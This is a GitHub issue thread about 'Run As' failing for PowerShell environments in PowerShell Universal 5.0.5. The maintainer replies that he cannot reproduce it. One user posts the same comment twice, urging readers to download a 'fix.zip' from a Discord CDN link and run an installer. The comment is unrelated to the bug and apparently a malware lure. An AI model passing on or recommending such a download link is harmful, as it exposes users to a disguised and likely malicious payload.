### ISSUE TITLE
Run As Not working for Windows PowerShell and PowerShell 7 Environments

### ISSUE THREAD

**Issue by adamdriscoll** [ironmansoftware/powershell-universal#3691]
### Version

5.0.5

### Severity

Low

### Environment

msi

### Steps to Reproduce

The new agent environments don't seem to load when running as a different user. Running as pwsh.exe works fine. 

### Expected behavior

```console
Run as a different user
```

### Actual behavior

```console
Doesn't run as user.
```

**Comment by Dominic54321** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by Dominic54321** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by adamdriscoll** [comment]
I cannot reproduce this. Run as credentials work fine.
